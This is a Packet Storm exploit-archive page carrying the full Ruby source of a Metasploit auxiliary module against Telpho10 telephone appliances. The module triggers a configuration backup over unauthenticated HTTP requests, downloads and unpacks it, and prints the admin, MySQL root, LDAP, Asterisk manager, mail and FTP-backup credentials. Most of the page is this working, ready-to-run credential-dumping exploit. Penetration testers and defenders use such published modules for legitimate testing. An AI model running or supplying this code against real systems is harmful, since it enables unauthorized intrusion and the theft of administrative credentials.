what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Telpho10 Backup Credentials Dumper

Telpho10 Backup Credentials Dumper
Posted Aug 31, 2024
Authored by Jan Rude | Site metasploit.com

This Metasploit module exploits a vulnerability present in all versions of Telpho10 telephone system appliance. This Metasploit module generates a configuration backup of Telpho10, downloads the file and dumps the credentials for admin login, phpmyadmin, phpldapadmin, etc. This Metasploit module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.

tags | exploit, telephony
SHA-256 | 94e832c4a55946a0bafe2584caa72b0c8f7a000472011e442c2d49d287911a3f

Telpho10 Backup Credentials Dumper

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Telpho10 Backup Credentials Dumper',
'Description' => %q{
This module exploits a vulnerability present in all versions of Telpho10 telephone system
appliance. This module generates a configuration backup of Telpho10,
downloads the file and dumps the credentials for admin login,
phpmyadmin, phpldapadmin, etc.
This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.
},
'Author' => 'Jan Rude', # Vulnerability Discovery and Metasploit Module
'License' => MSF_LICENSE,
'References' => ['URL', 'https://github.com/whoot/TelpOWN'],
'Platform' => 'linux',
'Privileged' => false,
'DisclosureDate' => '2016-09-02'
)
)

register_options(
[
Opt::RPORT(80)
]
)
end

# Used for unpacking backup files
def untar(tarfile)
destination = tarfile.split('.tar').first
FileUtils.mkdir_p(destination)
File.open(tarfile, 'rb') do |file|
Rex::Tar::Reader.new(file) do |tar|
tar.each do |entry|
dest = File.join(destination, File.basename(entry.full_name))
next unless entry.file?

File.open(dest, 'wb') do |f|
f.write(entry.read)
end
File.chmod(entry.header.mode, dest)
end
end
end
return destination
end

# search for credentials in backup file
def dump_creds(mysql_file)
file = File.new(mysql_file, 'r')
while (line = file.gets)
if line.include? 'adminusername'
config = [line]
end
end
file.close

print_status('Login (/telpho/login.php)')
print_status('-------------------------')
print_good("Username: #{config.first[/adminusername','(.*?)'/, 1]}")
print_good("Password: #{config.first[/adminpassword','(.*?)'/, 1]}\n")

print_status('MySQL (/phpmyadmin)')
print_status('-------------------')
print_good('Username: root')
print_good("Password: #{config.first[/dbpassword','(.*?)'/, 1]}\n")

print_status('LDAP (/phpldapadmin)')
print_status('--------------------')
print_good('Username: cn=admin,dc=localdomain')
print_good("Password: #{config.first[/ldappassword','(.*?)'/, 1]}\n")

print_status('Asterisk MI (port 5038)')
print_status('-----------------------')
print_good("Username: #{config.first[/manageruser','(.*?)'/, 1]}")
print_good("Password: #{config.first[/managersecret','(.*?)'/, 1]}\n")

print_status('Mail configuration')
print_status('------------------')
print_good("Mailserver: #{config.first[/ipsmarthost','(.*?)'/, 1]}")
print_good("Username: #{config.first[/mailusername','(.*?)'/, 1]}")
print_good("Password: #{config.first[/mailpassword','(.*?)'/, 1]}")
print_good("Mail from: #{config.first[/mailfrom','(.*?)'/, 1]}\n")

print_status('Online Backup')
print_status('-------------')
print_good("ID: #{config.first[/ftpbackupid','(.*?)'/, 1]}")
print_good("Password: #{config.first[/ftpbackuppw','(.*?)'/, 1]}\n")
end

def run
res = send_request_cgi({
'uri' => '/telpho/system/backup.php',
'method' => 'GET'
})
if res && res.code == 200
print_status('Generating backup')
sleep(1)
else
print_error('Could not find vulnerable script. Aborting.')
return nil
end

print_status('Downloading backup')
res = send_request_cgi({
'uri' => '/telpho/temp/telpho10.epb',
'method' => 'GET'
})
if res && res.code == 200
if res.body.to_s.bytesize == 0
print_error('0 bytes returned, file does not exist or is empty.')
return nil
end

path = store_loot(
'telpho10.backup',
'application/x-compressed',
datastore['RHOST'],
res.body,
'backup.tar'
)
print_good("File saved in: #{path}")

begin
extracted = untar(path.to_s)
mysql = untar("#{extracted}/mysql.tar")
rescue StandardError
print_error('Could not unpack files.')
return nil
end
begin
print_status("Dumping credentials\n")
dump_creds("#{mysql}/mysql.epb")
rescue StandardError
print_error('Could not find credential file.')
return nil
end
else
print_error('Failed to download backup file.')
return nil
end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - Failed to connect")
return nil
end
end
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close